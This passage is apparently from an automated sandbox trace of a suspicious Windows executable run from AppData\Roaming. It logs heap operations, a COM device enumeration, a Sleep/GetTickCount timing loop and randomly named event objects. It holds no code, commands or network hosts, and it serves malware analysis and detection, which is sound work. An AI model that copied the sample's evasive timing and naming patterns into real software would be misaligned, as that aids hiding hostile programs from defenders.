hHeap=0x170000, dwFlags=0x0, lpMem=0x184f50 | out: hHeap=0x170000) returned 1 [0183.438] GetProcessHeap () returned 0x170000 [0183.438] GetProcessHeap () returned 0x170000 [0183.438] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184f70) returned 1 [0183.438] GetProcessHeap () returned 0x170000 [0183.438] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184f70) returned 0x14 [0183.438] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184f70 | out: hHeap=0x170000) returned 1 [0183.438] GetProcessHeap () returned 0x170000 [0183.438] GetProcessHeap () returned 0x170000 [0183.438] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184f90) returned 1 [0183.438] GetProcessHeap () returned 0x170000 [0183.438] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184f90) returned 0x14 [0183.439] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184f90 | out: hHeap=0x170000) returned 1 [0183.439] GetProcessHeap () returned 0x170000 [0183.439] GetProcessHeap () returned 0x170000 [0183.439] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184fb0) returned 1 [0183.439] GetProcessHeap () returned 0x170000 [0183.439] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184fb0) returned 0x14 [0183.439] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184fb0 | out: hHeap=0x170000) returned 1 [0183.439] GetProcessHeap () returned 0x170000 [0183.439] GetProcessHeap () returned 0x170000 [0183.439] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185248) returned 1 [0183.439] GetProcessHeap () returned 0x170000 [0183.439] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185248) returned 0x14 [0183.439] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185248 | out: hHeap=0x170000) returned 1 [0183.439] GetProcessHeap () returned 0x170000 [0183.439] GetProcessHeap () returned 0x170000 [0183.439] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185268) returned 1 [0183.439] GetProcessHeap () returned 0x170000 [0183.439] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185268) returned 0x14 [0183.439] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185268 | out: hHeap=0x170000) returned 1 [0183.439] GetProcessHeap () returned 0x170000 [0183.439] GetProcessHeap () returned 0x170000 [0183.439] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1868b0) returned 1 [0183.439] GetProcessHeap () returned 0x170000 [0183.439] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1868b0) returned 0x30 [0183.439] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1868b0 | out: hHeap=0x170000) returned 1 [0183.439] GetProcessHeap () returned 0x170000 [0183.439] GetProcessHeap () returned 0x170000 [0183.439] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185288) returned 1 [0183.439] GetProcessHeap () returned 0x170000 [0183.439] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185288) returned 0x14 [0183.440] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185288 | out: hHeap=0x170000) returned 1 [0183.440] GetProcessHeap () returned 0x170000 [0183.440] GetProcessHeap () returned 0x170000 [0183.440] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1868e8) returned 1 [0183.440] GetProcessHeap () returned 0x170000 [0183.440] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1868e8) returned 0x30 [0183.440] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1868e8 | out: hHeap=0x170000) returned 1 [0183.440] GetProcessHeap () returned 0x170000 [0183.440] GetProcessHeap () returned 0x170000 [0183.440] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185308) returned 1 [0183.440] GetProcessHeap () returned 0x170000 [0183.440] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185308) returned 0x14 [0183.440] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185308 | out: hHeap=0x170000) returned 1 [0183.440] GetProcessHeap () returned 0x170000 [0183.440] GetProcessHeap () returned 0x170000 [0183.440] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x191540) returned 1 [0183.440] GetProcessHeap () returned 0x170000 [0183.440] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x191540) returned 0xe [0183.440] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x191540 | out: hHeap=0x170000) returned 1 [0183.440] GetProcessHeap () returned 0x170000 [0183.440] GetProcessHeap () returned 0x170000 [0183.440] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1856e8) returned 1 [0183.440] GetProcessHeap () returned 0x170000 [0183.440] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1856e8) returned 0x14 [0183.440] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1856e8 | out: hHeap=0x170000) returned 1 [0183.440] GetProcessHeap () returned 0x170000 [0183.440] GetProcessHeap () returned 0x170000 [0183.440] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184b88) returned 1 [0183.440] GetProcessHeap () returned 0x170000 [0183.440] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184b88) returned 0x10 [0183.441] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184b88 | out: hHeap=0x170000) returned 1 [0183.441] GetProcessHeap () returned 0x170000 [0183.441] GetProcessHeap () returned 0x170000 [0183.441] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184fd0) returned 1 [0183.441] GetProcessHeap () returned 0x170000 [0183.441] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184fd0) returned 0x14 [0183.441] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184fd0 | out: hHeap=0x170000) returned 1 [0183.441] GetProcessHeap () returned 0x170000 [0183.441] GetProcessHeap () returned 0x170000 [0183.441] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184ff0) returned 1 [0183.441] GetProcessHeap () returned 0x170000 [0183.441] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184ff0) returned 0x14 [0183.441] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184ff0 | out: hHeap=0x170000) returned 1 [0183.441] GetProcessHeap () returned 0x170000 [0183.441] GetProcessHeap () returned 0x170000 [0183.441] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185010) returned 1 [0183.441] GetProcessHeap () returned 0x170000 [0183.441] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185010) returned 0x14 [0183.441] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185010 | out: hHeap=0x170000) returned 1 [0183.441] GetProcessHeap () returned 0x170000 [0183.441] GetProcessHeap () returned 0x170000 [0183.441] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185030) returned 1 [0183.441] GetProcessHeap () returned 0x170000 [0183.442] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185030) returned 0x14 [0183.442] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185030 | out: hHeap=0x170000) returned 1 [0183.442] GetProcessHeap () returned 0x170000 [0183.442] GetProcessHeap () returned 0x170000 [0183.442] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184ba0) returned 1 [0183.442] GetProcessHeap () returned 0x170000 [0183.442] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184ba0) returned 0x10 [0183.442] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184ba0 | out: hHeap=0x170000) returned 1 [0183.442] GetProcessHeap () returned 0x170000 [0183.442] GetProcessHeap () returned 0x170000 [0183.442] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185050) returned 1 [0183.442] GetProcessHeap () returned 0x170000 [0183.442] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185050) returned 0x14 [0183.442] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185050 | out: hHeap=0x170000) returned 1 [0183.442] GetProcessHeap () returned 0x170000 [0183.442] GetProcessHeap () returned 0x170000 [0183.442] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1850c8) returned 1 [0183.442] GetProcessHeap () returned 0x170000 [0183.442] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1850c8) returned 0x14 [0183.442] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1850c8 | out: hHeap=0x170000) returned 1 [0183.442] GetProcessHeap () returned 0x170000 [0183.442] GetProcessHeap () returned 0x170000 [0183.442] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185148) returned 1 [0183.442] GetProcessHeap () returned 0x170000 [0183.442] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185148) returned 0x14 [0183.442] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185148 | out: hHeap=0x170000) returned 1 [0183.442] GetProcessHeap () returned 0x170000 [0183.442] GetProcessHeap () returned 0x170000 [0183.442] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185168) returned 1 [0183.442] GetProcessHeap () returned 0x170000 [0183.442] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185168) returned 0x14 [0183.443] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185168 | out: hHeap=0x170000) returned 1 [0183.443] GetProcessHeap () returned 0x170000 [0183.443] GetProcessHeap () returned 0x170000 [0183.443] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185208) returned 1 [0183.443] GetProcessHeap () returned 0x170000 [0183.443] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185208) returned 0x14 [0183.443] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185208 | out: hHeap=0x170000) returned 1 [0183.443] GetProcessHeap () returned 0x170000 [0183.443] GetProcessHeap () returned 0x170000 [0183.443] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184bb8) returned 1 [0183.443] GetProcessHeap () returned 0x170000 [0183.443] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184bb8) returned 0x10 [0183.443] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184bb8 | out: hHeap=0x170000) returned 1 [0183.443] GetProcessHeap () returned 0x170000 [0183.443] GetProcessHeap () returned 0x170000 [0183.443] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1850e8) returned 1 [0183.443] GetProcessHeap () returned 0x170000 [0183.443] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1850e8) returned 0x14 [0183.443] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1850e8 | out: hHeap=0x170000) returned 1 [0183.443] GetProcessHeap () returned 0x170000 [0183.443] GetProcessHeap () returned 0x170000 [0183.443] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184b70) returned 1 [0183.443] GetProcessHeap () returned 0x170000 [0183.443] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184b70) returned 0x10 [0183.443] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184b70 | out: hHeap=0x170000) returned 1 [0183.443] exit (_Code=1) Thread: id = 183 os_tid = 0x4d0 Process: id = "18" image_name = "chfiqxtpqp.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe" page_root = "0x6387d000" os_pid = "0x7b8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x678" cmd_line = "\"{path}\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 184 os_tid = 0x4c4 [0183.929] GetCommandLineA () returned="\"{path}\"" [0183.929] GetStartupInfoA (in: lpStartupInfo=0x34fbcc | out: lpStartupInfo=0x34fbcc*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0183.929] GetProcessHeap () returned 0x900000 [0183.929] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x8, Size=0x80) returned 0x91e6d0 [0184.154] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0xb8 [0184.154] GetProcessHeap () returned 0x900000 [0184.154] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x38) returned 0x912e00 [0184.176] GetProcessHeap () returned 0x900000 [0184.176] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x14) returned 0x912e40 [0184.176] GetProcessHeap () returned 0x900000 [0184.176] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x28) returned 0x91d240 [0184.176] GetProcessHeap () returned 0x900000 [0184.176] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x8, Size=0x50) returned 0x91e758 [0184.176] GetProcessHeap () returned 0x900000 [0184.176] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x8, Size=0xa0) returned 0x91e7b0 [0184.176] CoInitialize (pvReserved=0x0) returned 0x0 [0184.186] CoCreateInstance (in: rclsid=0x4135d0*(Data1=0x62be5d10, Data2=0x60eb, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x416314*(Data1=0x29840822, Data2=0x5b84, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppv=0x34fb88 | out: ppv=0x34fb88*=0xbff608) returned 0x0 [0184.249] SystemDeviceEnum:ICreateDevEnum:CreateClassEnumerator (in: This=0xbff608, clsidDeviceClass=0x4135c0*(Data1=0x860bb310, Data2=0x5d01, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppenumMoniker=0x34fb8c, dwFlags=0x0 | out: ppenumMoniker=0x34fb8c*=0x0) returned 0x1 [0184.323] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x220000 [0184.324] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x230000 [0184.324] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x240000 [0184.324] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3d0000 [0184.324] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3e0000 [0184.324] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0184.325] GetProcessHeap () returned 0x900000 [0184.325] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x19) returned 0x926b08 [0184.325] GetProcessHeap () returned 0x900000 [0184.325] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x19) returned 0x934070 [0184.325] GetProcessHeap () returned 0x900000 [0184.325] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x19) returned 0x934318 [0184.325] GetProcessHeap () returned 0x900000 [0184.325] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x19) returned 0x9342f0 [0184.325] GetProcessHeap () returned 0x900000 [0184.325] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x19) returned 0x9342c8 [0184.325] GetProcessHeap () returned 0x900000 [0184.325] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x19) returned 0x9342a0 [0184.325] Sleep (dwMilliseconds=0x1) [0184.330] GetTickCount () returned 0x113c958 [0184.330] Sleep (dwMilliseconds=0x1) [0184.345] GetTickCount () returned 0x113c968 [0184.346] Sleep (dwMilliseconds=0x1) [0184.361] GetTickCount () returned 0x113c977 [0184.361] Sleep (dwMilliseconds=0x1) [0184.377] GetTickCount () returned 0x113c987 [0184.377] Sleep (dwMilliseconds=0x1) [0184.392] GetTickCount () returned 0x113c996 [0184.392] Sleep (dwMilliseconds=0x1) [0184.408] GetTickCount () returned 0x113c9a6 [0184.408] Sleep (dwMilliseconds=0x1) [0184.424] GetTickCount () returned 0x113c9b6 [0184.424] Sleep (dwMilliseconds=0x1) [0184.439] GetTickCount () returned 0x113c9c5 [0184.439] Sleep (dwMilliseconds=0x1) [0184.455] GetTickCount () returned 0x113c9d5 [0184.455] Sleep (dwMilliseconds=0x1) [0184.472] GetTickCount () returned 0x113c9e4 [0184.472] Sleep (dwMilliseconds=0x1) [0184.486] GetTickCount () returned 0x113c9f4 [0184.486] Sleep (dwMilliseconds=0x1) [0184.502] GetTickCount () returned 0x113ca04 [0184.502] Sleep (dwMilliseconds=0x1) [0184.517] GetTickCount () returned 0x113ca13 [0184.517] Sleep (dwMilliseconds=0x1) [0184.533] GetTickCount () returned 0x113ca23 [0184.533] Sleep (dwMilliseconds=0x1) [0184.549] GetTickCount () returned 0x113ca32 [0184.549] Sleep (dwMilliseconds=0x1) [0184.564] GetTickCount () returned 0x113ca42 [0184.564] Sleep (dwMilliseconds=0x1) [0184.580] GetTickCount () returned 0x113ca52 [0184.580] Sleep (dwMilliseconds=0x1) [0184.595] GetTickCount () returned 0x113ca61 [0184.595] Sleep (dwMilliseconds=0x1) [0184.613] GetTickCount () returned 0x113ca71 [0184.613] Sleep (dwMilliseconds=0x1) [0184.626] GetTickCount () returned 0x113ca80 [0184.626] Sleep (dwMilliseconds=0x1) [0184.642] GetTickCount () returned 0x113ca90 [0184.642] Sleep (dwMilliseconds=0x1) [0184.658] GetTickCount () returned 0x113caa0 [0184.658] Sleep (dwMilliseconds=0x1) [0184.673] GetTickCount () returned 0x113caaf [0184.673] Sleep (dwMilliseconds=0x1) [0184.689] GetTickCount () returned 0x113cabf [0184.689] Sleep (dwMilliseconds=0x1) [0184.706] GetTickCount () returned 0x113cace [0184.706] Sleep (dwMilliseconds=0x1) [0184.720] GetTickCount () returned 0x113cade [0184.720] Sleep (dwMilliseconds=0x1) [0184.736] GetTickCount () returned 0x113caee [0184.736] Sleep (dwMilliseconds=0x1) [0184.751] GetTickCount () returned 0x113cafd [0184.751] Sleep (dwMilliseconds=0x1) [0184.767] GetTickCount () returned 0x113cb0d [0184.767] Sleep (dwMilliseconds=0x1) [0184.783] GetTickCount () returned 0x113cb1c [0184.783] Sleep (dwMilliseconds=0x1) [0184.799] GetTickCount () returned 0x113cb2c [0184.799] Sleep (dwMilliseconds=0x1) [0184.814] GetTickCount () returned 0x113cb3c [0184.814] Sleep (dwMilliseconds=0x1) [0184.830] GetTickCount () returned 0x113cb4b [0184.830] Sleep (dwMilliseconds=0x1) [0184.845] GetTickCount () returned 0x113cb5b [0184.845] Sleep (dwMilliseconds=0x1) [0184.861] GetTickCount () returned 0x113cb6a [0184.861] Sleep (dwMilliseconds=0x1) [0184.876] GetTickCount () returned 0x113cb7a [0184.876] Sleep (dwMilliseconds=0x1) [0184.892] GetTickCount () returned 0x113cb8a [0184.892] Sleep (dwMilliseconds=0x1) [0184.907] GetTickCount () returned 0x113cb99 [0184.907] Sleep (dwMilliseconds=0x1) [0184.924] GetTickCount () returned 0x113cba9 [0184.924] Sleep (dwMilliseconds=0x1) [0184.938] GetTickCount () returned 0x113cbb8 [0184.938] Sleep (dwMilliseconds=0x1) [0184.954] GetTickCount () returned 0x113cbc8 [0184.954] Sleep (dwMilliseconds=0x1) [0184.970] GetTickCount () returned 0x113cbd8 [0184.970] Sleep (dwMilliseconds=0x1) [0184.990] GetTickCount () returned 0x113cbe7 [0184.990] Sleep (dwMilliseconds=0x1) [0185.001] GetTickCount () returned 0x113cbf7 [0185.001] Sleep (dwMilliseconds=0x1) [0185.016] GetTickCount () returned 0x113cc06 [0185.017] Sleep (dwMilliseconds=0x1) [0185.032] GetTickCount () returned 0x113cc16 [0185.032] Sleep (dwMilliseconds=0x1) [0185.048] GetTickCount () returned 0x113cc26 [0185.048] Sleep (dwMilliseconds=0x1) [0185.063] GetTickCount () returned 0x113cc35 [0185.063] Sleep (dwMilliseconds=0x1) [0185.079] GetTickCount () returned 0x113cc45 [0185.079] Sleep (dwMilliseconds=0x1) [0185.113] GetTickCount () returned 0x113cc64 [0185.114] Sleep (dwMilliseconds=0x1) [0185.126] GetTickCount () returned 0x113cc74 [0185.126] Sleep (dwMilliseconds=0x1) [0185.141] GetTickCount () returned 0x113cc83 [0185.141] Sleep (dwMilliseconds=0x1) [0185.157] GetTickCount () returned 0x113cc93 [0185.157] Sleep (dwMilliseconds=0x1) [0185.172] GetTickCount () returned 0x113cca2 [0185.172] Sleep (dwMilliseconds=0x1) [0185.190] GetTickCount () returned 0x113ccb2 [0185.190] Sleep (dwMilliseconds=0x1) [0185.204] GetTickCount () returned 0x113ccc2 [0185.204] Sleep (dwMilliseconds=0x1) [0185.219] GetTickCount () returned 0x113ccd1 [0185.219] Sleep (dwMilliseconds=0x1) [0185.236] GetTickCount () returned 0x113cce1 [0185.236] Sleep (dwMilliseconds=0x1) [0185.250] GetTickCount () returned 0x113ccf0 [0185.250] Sleep (dwMilliseconds=0x1) [0185.267] GetTickCount () returned 0x113cd00 [0185.267] lstrlenA (lpString="cQdWSK2KP8") returned 10 [0185.267] lstrlenA (lpString="cQdWSK2KP8") returned 10 [0185.267] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.267] lstrcpyA (in: lpString1=0xae0000, lpString2="cQdWSK2KP8" | out: lpString1="cQdWSK2KP8") returned="cQdWSK2KP8" [0185.268] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.268] lstrlenA (lpString="cQdWSK2KP8") returned 10 [0185.268] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x220000 [0185.268] lstrcatA (in: lpString1="", lpString2="cQdWSK2KP8" | out: lpString1="cQdWSK2KP8") returned="cQdWSK2KP8" [0185.268] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="cQdWSK2KP8") returned 0x144 [0185.268] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.268] lstrlenA (lpString="8UxOs0GoRi") returned 10 [0185.268] lstrlenA (lpString="8UxOs0GoRi") returned 10 [0185.268] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.269] lstrcpyA (in: lpString1=0xae0000, lpString2="8UxOs0GoRi" | out: lpString1="8UxOs0GoRi") returned="8UxOs0GoRi" [0185.269] VirtualFree (lpAddress=0x230000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.269] lstrlenA (lpString="8UxOs0GoRi") returned 10 [0185.269] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x230000 [0185.269] lstrcatA (in: lpString1="", lpString2="8UxOs0GoRi" | out: lpString1="8UxOs0GoRi") returned="8UxOs0GoRi" [0185.269] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="8UxOs0GoRi") returned 0x148 [0185.269] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.269] lstrlenA (lpString="eGHG0gUaTI") returned 10 [0185.269] lstrlenA (lpString="eGHG0gUaTI") returned 10 [0185.269] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.270] lstrcpyA (in: lpString1=0xae0000, lpString2="eGHG0gUaTI" | out: lpString1="eGHG0gUaTI") returned="eGHG0gUaTI" [0185.270] VirtualFree (lpAddress=0x240000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.270] lstrlenA (lpString="eGHG0gUaTI") returned 10 [0185.270] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x240000 [0185.270] lstrcatA (in: lpString1="", lpString2="eGHG0gUaTI" | out: lpString1="eGHG0gUaTI") returned="eGHG0gUaTI" [0185.270] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="eGHG0gUaTI") returned 0x188 [0185.270] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.270] lstrlenA (lpString="AKt8QMQ4Va") returned 10 [0185.270] lstrlenA (lpString="AKt8QMQ4Va") returned 10 [0185.270] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.271] lstrcpyA (in: lpString1=0xae0000, lpString2="AKt8QMQ4Va" | out: lpString1="AKt8QMQ4Va") returned="AKt8QMQ4Va" [0185.271] VirtualFree (lpAddress=0x3d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.271] lstrlenA (lpString="AKt8QMQ4Va") returned 10 [0185.271] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x3d0000 [0185.271] lstrcatA (in: lpString1="", lpString2="AKt8QMQ4Va" | out: lpString1="AKt8QMQ4Va") returned="AKt8QMQ4Va" [0185.271] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="AKt8QMQ4Va") returned 0x18c [0185.271] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.271] lstrlenA (lpString="g6D0Y2eqXO") returned 10 [0185.271] lstrlenA (lpString="g6D0Y2eqXO") returned 10 [0185.271] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.272] lstrcpyA (in: lpString1=0xae0000, lpString2="g6D0Y2eqXO" | out: lpString1="g6D0Y2eqXO") returned="g6D0Y2eqXO" [0185.272] VirtualFree (lpAddress=0x3e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.272] lstrlenA (lpString="g6D0Y2eqXO") returned 10 [0185.272] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x3e0000 [0185.272] lstrcatA (in: lpString1="", lpString2="g6D0Y2eqXO" | out: lpString1="g6D0Y2eqXO") returned="g6D0Y2eqXO" [0185.272] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="g6D0Y2eqXO") returned 0x190 [0185.272] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.272] lstrlenA (lpString="SSFy82pocg") returned 10 [0185.272] lstrlenA (lpString="SSFy82pocg") returned 10 [0185.272] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.273] lstrcpyA (in: lpString1=0xae0000, lpString2="SSFy82pocg" | out: lpString1="SSFy82pocg") returned="SSFy82pocg" [0185.273] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.273] lstrlenA (lpString="SSFy82pocg") returned 10 [0185.273] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0185.273] lstrcatA (in: lpString1="", lpString2="SSFy82pocg" | out: lpString1="SSFy82pocg") returned="SSFy82pocg" [0185.273] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="SSFy82pocg") returned 0x194 [0185.273] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.303] GetProcessHeap () returned 0x900000 [0185.303] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x54) returned 0x936bc8 [0185.324] GetProcessHeap () returned 0x900000 [0185.324] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x7c) returned 0x938460 [0185.324] CreateMutexA 